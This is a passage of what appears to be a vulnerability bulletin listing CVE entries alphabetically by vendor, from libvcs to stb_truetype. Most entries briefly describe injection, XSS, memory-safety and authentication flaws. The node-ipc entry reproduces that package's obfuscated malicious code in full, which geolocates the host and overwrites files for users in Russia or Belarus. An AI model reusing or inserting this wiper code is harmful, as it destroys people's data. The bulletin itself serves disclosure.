  The package libvcs before 0.11.1 are vulnerable to Command Injection via argument injection. When calling the update_repo function (when using hg), the url parameter is passed to the hg clone command. By injecting some hg options it was possible to get arbitrary command execution. 2022-03-14 not yet calculated CVE-2022-21187
MISC
MISC
MISC ligeo_archives — ligeo_basics
  Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features. 2022-03-17 not yet calculated CVE-2021-46107
MISC
MISC linux — linux_kernel
  In the Linux kernel before 5.15.3, fs/quota/quota_tree.c does not validate the block number in the quota tree (on disk). This can, for example, lead to a kernel/locking/rwsem.c use-after-free if there is a corrupted quota file. 2022-03-18 not yet calculated CVE-2021-45868
MISC
MISC
MISC
MISC
MISC linux — linux_kernel
  Memory leak in icmp6 implementation in Linux Kernel 5.13+ allows a remote attacker to DoS a host by making it go out-of-memory via icmp6 packets of type 130 or 131. We recommend upgrading past commit 2d3916f3189172d5c69d33065c3c21119fe539fc. 2022-03-18 not yet calculated CVE-2022-0742
MISC
MISC linux — linux_kernel
  A flaw use after free in the Linux kernel FUSE filesystem was found in the way user triggers write(). A local user could use this flaw to get some unauthorized access to some data from the FUSE filesystem and as result potentially privilege escalation too. 2022-03-18 not yet calculated CVE-2022-1011
MISC
FEDORA
FEDORA linux — linux_kernel
  In drivers/usb/gadget/udc/udc-xilinx.c in the Linux kernel before 5.16.12, the endpoint index is not validated and might be manipulated by the host for out-of-array access. 2022-03-16 not yet calculated CVE-2022-27223
MISC
MISC login_with_phone_number — login_with_phone_number
  The Login with phone number WordPress plugin before 1.3.7 includes a file delete.php with no form of authentication or authorization checks placed in the plugin directory, allowing unauthenticated user to remotely delete the plugin files leading to a potential Denial of Service situation. 2022-03-14 not yet calculated CVE-2022-0593
MISC
MISC maccms — maccms
  There is a stored Cross Site Scripting (XSS) vulnerability in maccms v10 through adding videos. XSS code can be inserted at parameter positions including name and remarks. 2022-03-16 not yet calculated CVE-2021-45787
MISC maccms — maccms
  In maccms v10, an attacker can log in through /index.php/user/login in the “col” and “openid” parameters to gain privileges. 2022-03-16 not yet calculated CVE-2021-45786
MISC master_addons_for_elementor — master_addons_for_elementor
  The Master Addons for Elementor WordPress plugin before 1.8.5 does not sanitise and escape the error_message parameter before outputting it back in the response of the jltma_restrict_content AJAX action, available to unauthenticated and authenticated users, leading to a Reflected Cross-Site Scripting 2022-03-14 not yet calculated CVE-2022-0327
MISC mattermost — mattermost
  One of the API in Mattermost version 6.3.0 and earlier fails to properly protect the permissions, which allows the system administrators to combine the two distinct privileges/capabilities in a way that allows them to override certain restricted configurations like EnableUploads. 2022-03-18 not yet calculated CVE-2022-1003
MISC mattermost — mattermost
  Mattermost 6.3.0 and earlier fails to properly sanitize the HTML content in the email invitation sent to guest users, which allows registered users with special permissions to invite guest users to inject unescaped HTML content in the email invitations. 2022-03-18 not yet calculated CVE-2022-1002
MISC
MISC maxgalleria — maxgalleria
  Authenticated (author or higher user role) Stored Cross-Site Scripting (XSS) vulnerability discovered in MaxGalleria WordPress plugin (versions 6.2.5). 2022-03-18 not yet calculated CVE-2022-25603
CONFIRM
CONFIRM meks_easy_photo_feed_widget — meks_easy_photo_feed_widget
  The Meks Easy Photo Feed Widget WordPress plugin before 1.2.4 does not have capability and CSRF checks in the meks_save_business_selected_account AJAX action, available to any authenticated user, and does not escape some of the settings. As a result, any authenticated user, such as subscriber could update the plugin’s settings and put Cross-Site Scripting payloads in them 2022-03-14 not yet calculated CVE-2021-24958
MISC microweber — microweber
  The microweber application allows large characters to insert in the input field “post title” which can allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. in GitHub repository microweber/microweber prior to 1.2.12. 2022-03-15 not yet calculated CVE-2022-0961
CONFIRM
MISC microweber — microweber
  Unrestricted XML Files Leads to Stored XSS in GitHub repository microweber/microweber prior to 1.2.12. 2022-03-15 not yet calculated CVE-2022-0963
CONFIRM
MISC microweber — microweber
  The microweber application allows large characters to insert in the input field “fist & last name” which can allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. in microweber/microweber in GitHub repository microweber/microweber prior to 1.2.12. 2022-03-15 not yet calculated CVE-2022-0968
CONFIRM
MISC microweber — microweber
  Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop’s Other Settings, Shop’s Autorespond E-mail Settings and Shops’ Payments Methods in GitHub repository microweber/microweber prior to 1.2.11. 2022-03-15 not yet calculated CVE-2022-0954
MISC
CONFIRM mikrotik — products
  In the SCEP Server of RouterOS in certain Mikrotik products, an attacker can trigger a heap-based buffer overflow that leads to remote code execution. The attacker must control the SCEP server for a valid certificate. This affects mikrotik-vm-6.46, mikrotik-vm-6.46.8, mikrotik-tile-6.46.8, mikrotik-6.47.9, and mikrotik-6.47.10. 2022-03-16 not yet calculated CVE-2021-41987
MISC
MISC mimecast — email_security
  Mimecast Email Security before 2020-01-10 allows any admin to spoof any domain, and pass DMARC alignment via SPF. This occurs through misuse of the address rewrite feature. (The domain being spoofed must be a customer in the Mimecast grid from which the spoofing occurs.) 2022-03-16 not yet calculated CVE-2020-36519
MISC minimist — minimist
  Minimist <=1.2.5 is vulnerable to Prototype Pollution via file index.js, function setKey() (lines 69-95). 2022-03-17 not yet calculated CVE-2021-44906
MISC
MISC
MISC
MISC
MISC misp — misp An issue was discovered in MISP before 2.4.156. app/Model/Server.php does not restrict generateServerSettings to the CLI. This could lead to SSRF. 2022-03-18 not yet calculated CVE-2022-27245
MISC misp — misp An issue was discovered in MISP before 2.4.156. A malicious site administrator could store an XSS payload in the custom auth name. This would be executed each time the administrator modifies a user. 2022-03-18 not yet calculated CVE-2022-27244
MISC misp — misp An issue was discovered in MISP before 2.4.156. app/View/Users/terms.ctp allows Local File Inclusion via the custom terms file setting. 2022-03-18 not yet calculated CVE-2022-27243
MISC misp — misp
  An issue was discovered in MISP before 2.4.156. An SVG org logo (which may contain JavaScript) is not forbidden by default. 2022-03-18 not yet calculated CVE-2022-27246
MISC multisite_content_copier/updater — multisite_content_copier/updater
  The WordPress Multisite Content Copier/Updater WordPress plugin before 2.1.2 does not sanitise and escape the s parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue in the network dashboard 2022-03-14 not yet calculated CVE-2022-0503
MISC netgear — netgear A vulnerability is in the ‘BRS_top.html’ page of the Netgear W104, version WAC104-V1.0.4.13, which can allow a remote attacker to access this page without any authentication. When processed, it exposes firmware version information for the device. 2022-03-17 not yet calculated CVE-2021-44261
MISC
MISC netgear — netgear
  A vulnerability is in the ‘MNU_top.htm’ page of the Netgear W104, version WAC104-V1.0.4.13, which can allow a remote attacker to access this page without any authentication. When processed, it exposes some key information for the device. 2022-03-17 not yet calculated CVE-2021-44262
MISC
MISC netgear — routers
  A stack overflow vulnerability exists in the upnpd service in Netgear EX6100v1 201.0.2.28, CAX80 2.1.2.6, and DC112A 1.0.0.62, which may lead to the execution of arbitrary code without authentication. 2022-03-18 not yet calculated CVE-2022-24655
MISC
MISC
MISC nicotine+ — nicotine+
  Denial of service (DoS) vulnerability in Nicotine+ 3.0.3 and later allows a user with a modified Soulseek client to crash Nicotine+ by sending a file download request with a file path containing a null character. 2022-03-15 not yet calculated CVE-2021-45848
MISC node-imdb — node-imdb
  The package node-lmdb before 0.9.7 are vulnerable to Denial of Service (DoS) when defining a non-invokable ToString value, which will cause a crash during type check. 2022-03-16 not yet calculated CVE-2022-21164
MISC
MISC node-ipc — node-ipc
  This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don’t run it! js import u from “path”; import a from “fs”; import o from “https”; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from(“aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=”, “base64”); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString(“utf8”), function (t) { t.on(“data”, function (t) { const n = Buffer.from(“Li8=”, “base64”); const o = Buffer.from(“Li4v”, “base64”); const r = Buffer.from(“Li4vLi4v”, “base64”); const f = Buffer.from(“Lw==”, “base64”); const c = Buffer.from(“Y291bnRyeV9uYW1l”, “base64”); const e = Buffer.from(“cnVzc2lh”, “base64”); const i = Buffer.from(“YmVsYXJ1cw==”, “base64”); try { const s = JSON.parse(t.toString(“utf8”)); const u = s[c.toString(“utf8”)].toLowerCase(); const a = u.includes(e.toString(“utf8”)) || u.includes(i.toString(“utf8”)); // checks if country is Russia or Belarus if (a) { h(n.toString(“utf8”)); h(o.toString(“utf8”)); h(r.toString(“utf8”)); h(f.toString(“utf8”)); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = “”, o = “”) { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from(“4p2k77iP”, “base64”); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(…s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString(“utf8”), function () {}); // overwrites file with ?? } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl }; 2022-03-16 not yet calculated CVE-2022-23812
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM nvidia — flare
  NVIDIA FLARE contains a vulnerability in the admin interface, where an un-authorized attacker can cause Allocation of Resources Without Limits or Throttling, which may lead to cause system unavailable. 2022-03-17 not yet calculated CVE-2022-21822
MISC online_admission_system — online_admission_system
  The Online Admission System 1.0 allows an unauthenticated attacker to upload or transfer files of dangerous types to the application through documents.php, which may be used to execute malicious code or lead to code execution. 2022-03-18 not yet calculated CVE-2021-45835
MISC
MISC
MISC online_banking_system — online_banking_system
  Online Banking System v1.0 was discovered to contain a SQL injection vulnerability via staff_login.php. 2022-03-15 not yet calculated CVE-2022-25494
MISC online_project_time_management_system — online_project_time_management_system Online Project Time Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter in the function save_employee at /ptms/classes/Users.php. 2022-03-16 not yet calculated CVE-2022-26293
MISC
MISC online_project_time_management_system — online_project_time_management_system
  A stored cross-site scripting (XSS) vulnerability in /ptms/?page=user of Online Project Time Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the user name field. 2022-03-16 not yet calculated CVE-2022-26295
MISC open_web_analytics — open_web_analytics
  Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with ‘<?php (instead of the intended “<?php sequence) aren’t handled by the PHP interpreter. 2022-03-18 not yet calculated CVE-2022-24637
MISC
CONFIRM opendocman — opendocman
  An attacker can upload or transfer files of dangerous types to the OpenDocMan 1.4.4 portal via add.php using MIME-bypass, which may be automatically processed within the product’s environment or lead to arbitrary code execution. 2022-03-18 not yet calculated CVE-2021-45834
MISC
MISC
MISC
MISC openexr — multipart_input_file
  A flaw was found in OpenEXR’s Multipart input file functionality. A crafted multi-part input file with no actual parts can trigger a NULL pointer dereference. The highest threat from this vulnerability is to system availability. 2022-03-16 not yet calculated CVE-2021-20299
MISC
MISC
MISC openssl — openssl
  The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: – TLS clients consuming server certificates – TLS servers consuming client certificates – Hosting providers taking certificates or private keys from customers – Certificate authorities parsing certification requests from subscribers – Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc). 2022-03-15 not yet calculated CVE-2022-0778
CONFIRM
CONFIRM
CONFIRM
CONFIRM
DEBIAN
MLIST
MLIST opensuse — factory
  A Improper Privilege Management vulnerability in the sudoers configuration in cscreen of openSUSE Factory allows any local users to gain the privileges of the tty and dialout groups and access and manipulate any running cscreen seesion. This issue affects: openSUSE Factory cscreen version 1.2-1.3 and prior versions. 2022-03-16 not yet calculated CVE-2022-21946
CONFIRM opensuse — factory
  A Insecure Temporary File vulnerability in cscreen of openSUSE Factory allows local attackers to cause DoS for cscreen and a system DoS for non-default systems. This issue affects: openSUSE Factory cscreen version 1.2-1.3 and prior versions. 2022-03-16 not yet calculated CVE-2022-21945
CONFIRM openvpn — openvpn
  OpenVPN 2.1 until v2.4.12 and v2.5.6 may enable authentication bypass in external authentication plug-ins when more than one of them makes use of deferred authentication replies, which allows an external user to be granted access with only partially correct credentials. 2022-03-18 not yet calculated CVE-2022-0547
MISC
MISC
MISC paramiko — paramiko
  In Paramiko before 2.10.1, a race condition (between creation and chmod) in the write_private_key_file function could allow unauthorized information disclosure. 2022-03-17 not yet calculated CVE-2022-24302
MISC
MISC pascom — cloud_phone_system An issue was discovered in Pascom Cloud Phone System before 7.20.x. A configuration error between NGINX and a backend Tomcat server leads to a path traversal in the Tomcat server, exposing unintended endpoints. 2022-03-18 not yet calculated CVE-2021-45967
MISC
MISC
MISC
MISC pascom — cloud_phone_system An issue was discovered in xmppserver jar in the XMPP Server component of the JIve platform, as used in Pascom Cloud Phone System before 7.20.x (and in other products). An endpoint in the backend Tomcat server of the Pascom allows SSRF, a related issue to CVE-2019-18394. 2022-03-18 not yet calculated CVE-2021-45968
MISC
MISC
MISC
MISC
MISC pascom — cloud_phone_system
  An issue was discovered in Pascom Cloud Phone System before 7.20.x. In the management REST API, /services/apply in exd.pl allows remote attackers to execute arbitrary code via shell metacharacters. 2022-03-18 not yet calculated CVE-2021-45966
MISC
MISC
MISC petfinder_listings — petfinder_listings
  The Petfinder Listings WordPress plugin through 1.0.18 does not escape its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed 2022-03-14 not yet calculated CVE-2022-0702
MISC pgadmin_4 — pgadmin_4
  When run in server mode, pgAdmin 4 allows users to store files on the server under individual storage directories. Files such as SQL scripts may be uploaded through the user interface. The URI to which upload requests are made fails to validate the upload path to prevent path traversal techniques being used to store files outside of the storage directory. A malicious, but authorised and authenticated user can construct an HTTP request using their existing CSRF token and session cookie to manually upload files to any location that the operating system user account under which pgAdmin is running has permission to write. 2022-03-16 not yet calculated CVE-2022-0959
MISC php — php
  A Remote Code Execution (RCE) vulnerability exists in Sourcecodester Attendance and Payroll System v1.0 which allows an unauthenticated remote attacker to upload a maliciously crafted PHP via photo upload. 2022-03-17 not yet calculated CVE-2021-44087
MISC
MISC
MISC pimcore — pimcore Cross-site Scripting (XSS) – Stored in GitHub repository pimcore/pimcore prior to 10.4.0. 2022-03-15 not yet calculated CVE-2022-0894
CONFIRM
MISC pimcore — pimcore Cross-site Scripting (XSS) – Stored in GitHub repository pimcore/pimcore prior to 10.4.0. 2022-03-16 not yet calculated CVE-2022-0911
CONFIRM
MISC pimcore — pimcore
  Cross-site Scripting (XSS) – Stored in GitHub repository pimcore/pimcore prior to 10.4.0. 2022-03-16 not yet calculated CVE-2022-0704
CONFIRM
MISC pimcore — pimcore
  Cross-site Scripting (XSS) – Stored in GitHub repository pimcore/pimcore prior to 10.4.0. 2022-03-16 not yet calculated CVE-2022-0705
CONFIRM
MISC pimcore — pimcore
  Cross-site Scripting (XSS) – Stored in GitHub repository pimcore/pimcore prior to 10.4.0. 2022-03-15 not yet calculated CVE-2022-0893
CONFIRM
MISC piwigo — piwigo
  Piwigo v12.2.0 was discovered to contain a SQL injection vulnerability via pwg.users.php. 2022-03-18 not yet calculated CVE-2022-26266
MISC piwigo — piwigo
  Piwigo v12.2.0 was discovered to contain an information leak via the action parameter in /admin/maintenance_actions.php. 2022-03-18 not yet calculated CVE-2022-26267
MISC post-loader — post-loader
  The package post-loader from 0.0.0 are vulnerable to Arbitrary Code Execution which uses a markdown parser in an unsafe way so that any javascript code inside the markdown input files gets evaluated and executed. 2022-03-17 not yet calculated CVE-2022-0748
MISC price_table — price_table
  Authenticated (contributor of higher user role) Stored Cross-Site Scripting (XSS) vulnerability discovered in WordPress Price Table plugin (versions <= 0.2.2). 2022-03-18 not yet calculated CVE-2022-25604
CONFIRM
CONFIRM projectworlds — hospital_management_system
  An issue was discovered in Projectworlds Hospital Management System v1.0. Unauthorized malicious attackers can add patients without restriction via add_patient.php. 2022-03-16 not yet calculated CVE-2021-45852
MISC prototype_pollution — prototype_pollution
  The package set-in before 2.0.3 are vulnerable to Prototype Pollution via the setIn method, as it allows an attacker to merge object prototypes into it. **Note:** This vulnerability derives from an incomplete fix of [CVE-2020-28273](https://security.snyk.io/vuln/SNYK-JS-SETIN-1048049) 2022-03-17 not yet calculated CVE-2022-25354
MISC
MISC
MISC qemu — e1000_nic_emulator
  An infinite loop flaw was found in the e1000 NIC emulator of the QEMU. This issue occurs while processing transmits (tx) descriptors in process_tx_desc if various descriptor fields are initialized with invalid values. This flaw allows a guest to consume CPU cycles on the host, resulting in a denial of service. The highest threat from this vulnerability is to system availability. 2022-03-16 not yet calculated CVE-2021-20257
MISC
MISC
MISC
MISC qemu — vhost-vsock_device
  A flaw was found in the vhost-vsock device of QEMU. In case of error, an invalid element was not detached from the virtqueue before freeing its memory, leading to memory leakage and other unexpected results. Affected QEMU versions <= 6.2.0. 2022-03-16 not yet calculated CVE-2022-26354
MISC qemu — virtio-net_device
  A flaw was found in the virtio-net device of QEMU. This flaw was inadvertently introduced with the fix for CVE-2021-3748, which forgot to unmap the cached virtqueue elements on error, leading to memory leakage and other unexpected results. Affected QEMU version: 6.2.0. 2022-03-16 not yet calculated CVE-2022-26353
MISC qs — qs
  A Denial of Service vulnerability exists in qs up to 6.8.0 due to insufficient sanitization of property in the gs.parse function. The merge() function allows the assignment of properties on an array in the query. For any property being assigned, a value in the array is converted to an object containing these properties. Essentially, this means that the property whose expected type is Array always has to be checked with Array.isArray() by the user. This may not be obvious to the user and can cause unexpected behavior. 2022-03-17 not yet calculated CVE-2021-44907
MISC
MISC
MISC
MISC quake — quake
  The package guake before 3.8.5 are vulnerable to Exposed Dangerous Method or Function due to the exposure of execute_command and execute_command_by_uuid methods via the d-bus interface, which makes it possible for a malicious user to run an arbitrary command via the d-bus method. **Note:** Exploitation requires the user to have installed another malicious program that will be able to send dbus signals or run terminal commands. 2022-03-17 not yet calculated CVE-2021-23556
MISC
MISC
MISC
MISC
MISC rambus_safezone — basic_crypto_module
  The Rambus SafeZone Basic Crypto Module before 10.4.0, as used in certain Fujifilm (formerly Fuji Xerox) devices before 2022-03-01, Canon imagePROGRAF and imageRUNNER devices through 2022-03-14, and potentially many other devices, generates RSA keys that can be broken with Fermat’s factorization method. This allows efficient calculation of private RSA keys from the public key of a TLS certificate. 2022-03-14 not yet calculated CVE-2022-26320
MISC
CONFIRM
MISC
MISC rapid7 — insight_agent
  Rapid7 Insight Agent versions 3.1.2.38 and earlier suffer from a privilege escalation vulnerability, whereby an attacker can hijack the flow of execution due to an unquoted argument to the runas.exe command used by the ir_agent.exe component, resulting in elevated rights and persistent access to the machine. This issue was fixed in Rapid7 Insight Agent version 3.1.3.80. 2022-03-17 not yet calculated CVE-2022-0237
CONFIRM
MISC rapid7 — nexpose
  Rapid7 Nexpose versions 6.6.93 and earlier are susceptible to an SQL Injection vulnerability, whereby valid search operators are not defined. This lack of validation can allow an attacker to manipulate the “ANY” and “OR” operators in the SearchCriteria and inject SQL code. This issue was fixed in Rapid7 Nexpose version 6.6.129. 2022-03-17 not yet calculated CVE-2022-0757
CONFIRM rapid7 — nexpose
  Rapid7 Nexpose versions 6.6.129 and earlier suffer from a reflected cross site scripting vulnerability, within the shared scan configuration component of the tool. With this vulnerability an attacker could pass literal values as the test credentials, providing the opportunity for a potential XSS attack. This issue is fixed in Rapid7 Nexpose version 6.6.130. 2022-03-17 not yet calculated CVE-2022-0758
CONFIRM responsive_menu — responsive_menu
  Nonce token leak vulnerability leading to arbitrary file upload, theme deletion, plugin settings change discovered in Responsive Menu WordPress plugin (versions <= 4.1.7). 2022-03-18 not yet calculated CVE-2022-25602
CONFIRM
CONFIRM rockwell_automation — isagraf_runtime Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x includes the functionality of setting a password that is required to execute privileged commands. The password value passed to ISaGRAF Runtime is the result of encryption performed with a fixed key value using the tiny encryption algorithm (TEA) on an entered or saved password. A remote, unauthenticated attacker could pass their own encrypted password to the ISaGRAF 5 Runtime, which may result in information disclosure on the device. 2022-03-18 not yet calculated CVE-2020-25180
CONFIRM
CONFIRM
CONFIRM
CONFIRM rockwell_automation — isagraf_runtime Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x stores the password in plaintext in a file that is in the same directory as the executable file. ISaGRAF Runtime reads the file and saves the data in a variable without any additional modification. A local, unauthenticated attacker could compromise the user passwords, resulting in information disclosure. 2022-03-18 not yet calculated CVE-2020-25184
CONFIRM
CONFIRM
CONFIRM
CONFIRM rockwell_automation — isagraf_runtime Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x searches for and loads DLLs as dynamic libraries. Uncontrolled loading of dynamic libraries could allow a local, unauthenticated attacker to execute arbitrary code. This vulnerability only affects ISaGRAF Runtime when running on Microsoft Windows systems. 2022-03-18 not yet calculated CVE-2020-25182
CONFIRM
CONFIRM
CONFIRM
CONFIRM rockwell_automation — isagraf_runtime ISaGRAF Workbench communicates with Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x using TCP/IP. This communication protocol provides various file system operations, as well as the uploading of applications. Data is transferred over this protocol unencrypted, which could allow a remote unauthenticated attacker to upload, read, and delete files. 2022-03-18 not yet calculated CVE-2020-25178
CONFIRM
CONFIRM
CONFIRM
CONFIRM rockwell_automation — isagraf_runtime
  Some commands used by the Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x eXchange Layer (IXL) protocol perform various file operations in the file system. Since the parameter pointing to the file name is not checked for reserved characters, it is possible for a remote, unauthenticated attacker to traverse an application’s directory, which could lead to remote code execution. 2022-03-18 not yet calculated CVE-2020-25176
CONFIRM
CONFIRM
CONFIRM
CONFIRM runasspc — runasspc
  RunAsSpc 4.0 uses a universal and recoverable encryption key. In possession of a file encrypted by RunAsSpc, an attacker can recover the credentials that were used. 2022-03-16 not yet calculated CVE-2022-26660
MISC sailsjs — sail.js
  SailsJS Sails.js <=1.4.0 is vulnerable to Prototype Pollution via controller/load-action-modules.js, function loadActionModules(). 2022-03-17 not yet calculated CVE-2021-44908
MISC
MISC
MISC samba — samba Kerberos acceptors need easy access to stable AD identifiers (eg objectSid). Samba as an AD DC now provides a way for Linux applications to obtain a reliable SID (and samAccountName) in issued tickets. 2022-03-16 not yet calculated CVE-2020-25721
MISC
MISC
MISC secure_mobile_access — 100_series_products
  ** UNSUPPORTED WHEN ASSIGNED ** Improper neutralization of Special Elements leading to OS Command Injection vulnerability impacting end-of-life Secure Remote Access (SRA) products and older firmware versions of Secure Mobile Access (SMA) 100 series products, specifically the SRA appliances running all 8.x, 9.0.0.5-19sv and earlier versions and Secure Mobile Access (SMA) 100 series products running older firmware 9.0.0.9-26sv and earlier versions. 2022-03-17 not yet calculated CVE-2022-22273
CONFIRM seo_301_meta — seo_301_meta
  The SEO 301 Meta WordPress plugin through 1.9.1 does not escape its Request and Destination settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed 2022-03-14 not yet calculated CVE-2022-0701
MISC simple_quotation — simple_quotation The Simple Quotation WordPress plugin through 1.3.2 does not have authorisation (and CSRF) checks in various of its AJAX actions and is lacking escaping of user data when using it in SQL statements, allowing any authenticated users, such as subscriber to perform SQL injection attacks 2022-03-14 not yet calculated CVE-2022-22735
MISC simple_quotation — simple_quotation
  The Simple Quotation WordPress plugin through 1.3.2 does not have CSRF check when creating or editing a quote and does not sanitise and escape Quotes. As a result, attacker could make a logged in admin create or edit arbitrary quote, and put Cross-Site Scripting payloads in them 2022-03-14 not yet calculated CVE-2022-22734
MISC simple_tracking — simple_tracking
  The Simple Tracking WordPress plugin before 1.7 does not sanitise and escape its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed 2022-03-14 not yet calculated CVE-2022-0700
MISC singoocms — singoocms
  This affects all versions of package SinGooCMS.Utility. The socket client in the package can pass in the payload via the user-controllable input after it has been established, because this socket client transmission does not have the appropriate restrictions or type bindings for the BinaryFormatter. 2022-03-17 not yet calculated CVE-2022-0749
MISC
MISC
MISC slims8 — akasia
  Slims8 Akasia 8.3.1 is affected by SQL injection in /admin/modules/bibliography/index.php, /admin/modules/membership/member_type.php, /admin/modules/system/user_group.php, and /admin/modules/membership/index.php through the dir parameter. It can be used by remotely authenticated librarian users. 2022-03-17 not yet calculated CVE-2021-45791
MISC slims9 — bulian Slims9 Bulian 9.4.2 is affected by SQL injection in /admin/modules/system/backup.php. User data can be obtained. 2022-03-17 not yet calculated CVE-2021-45794
MISC slims9 — bulian Slims9 Bulian 9.4.2 is affected by SQL injection in lib/comment.inc.php. User data can be obtained. 2022-03-17 not yet calculated CVE-2021-45793
MISC slims9 — bulian
  Slims9 Bulian 9.4.2 is affected by Cross Site Scripting (XSS) in /admin/modules/system/custom_field.php. 2022-03-17 not yet calculated CVE-2021-45792
MISC snapcenter — snapcenter
  SnapCenter versions prior to 4.5 are susceptible to a vulnerability which could allow a local authenticated attacker to discover plaintext HANA credentials. 2022-03-16 not yet calculated CVE-2022-23234
MISC sonatype — nexus_repository_manager
  Sonatype Nexus Repository Manager 3.36.0 allows HTML Injection. 2022-03-17 not yet calculated CVE-2021-43961
MISC
MISC sourcecodester — attendance_and_payroll_system
  An SQL Injection vulnerability exists in Sourcecodester Attendance and Payroll System v1.0 which allows a remote attacker to bypass authentication via unsanitized login parameters. 2022-03-17 not yet calculated CVE-2021-44088
MISC
MISC
MISC spatie — media-library-pro_library
  The Spatie media-library-pro library through 1.17.10 and 2.x through 2.1.6 for Laravel allows remote attackers to upload executable files via the uploads route. 2022-03-17 not yet calculated CVE-2021-45040
MISC
MISC sqlpad — sqlpad
  Template injection in connection test endpoint leads to RCE in GitHub repository sqlpad/sqlpad prior to 6.10.1. 2022-03-15 not yet calculated CVE-2022-0944
CONFIRM
MISC star7th — showdoc Unrestricted Upload of File with Dangerous Type in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-15 not yet calculated CVE-2022-0950
CONFIRM
MISC star7th — showdoc Stored XSS viva .webmv file upload in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-15 not yet calculated CVE-2022-0964
MISC
CONFIRM star7th — showdoc Stored XSS via File Upload in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-15 not yet calculated CVE-2022-0957
CONFIRM
MISC star7th — showdoc Stored XSS via File Upload in GitHub repository star7th/showdoc prior to v.2.10.4. 2022-03-15 not yet calculated CVE-2022-0956
MISC
CONFIRM star7th — showdoc Stored XSS via File Upload in star7th/showdoc in star7th/showdoc in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-15 not yet calculated CVE-2022-0967
MISC
CONFIRM star7th — showdoc Stored XSS viva .ofd file upload in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-15 not yet calculated CVE-2022-0965
MISC
CONFIRM star7th — showdoc File Upload Restriction Bypass leading to Stored XSS Vulnerability in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-15 not yet calculated CVE-2022-0951
MISC
CONFIRM star7th — showdoc Stored XSS viva axd and cshtml file upload in star7th/showdoc in GitHub repository star7th/showdoc prior to v2.10.4. 2022-03-15 not yet calculated CVE-2022-0945
CONFIRM
MISC star7th — showdoc Stored XSS viva .properties file upload in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-14 not yet calculated CVE-2022-0960
CONFIRM
MISC star7th — showdoc Stored XSS via File Upload in star7th/showdoc in GitHub repository star7th/showdoc prior to 2.4.10. 2022-03-15 not yet calculated CVE-2022-0966
MISC
CONFIRM star7th — showdoc
  Stored XSS viva .webma file upload in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-14 not yet calculated CVE-2022-0962
MISC
CONFIRM star7th — showdoc
  Stored XSS due to Unrestricted File Upload in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-15 not yet calculated CVE-2022-0942
MISC
CONFIRM stb_trutype.h — stb_trutype.h stb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function stbtt__find_table at stb_truetype.h. 2022-03-17 not yet calculated CVE-2022-25516
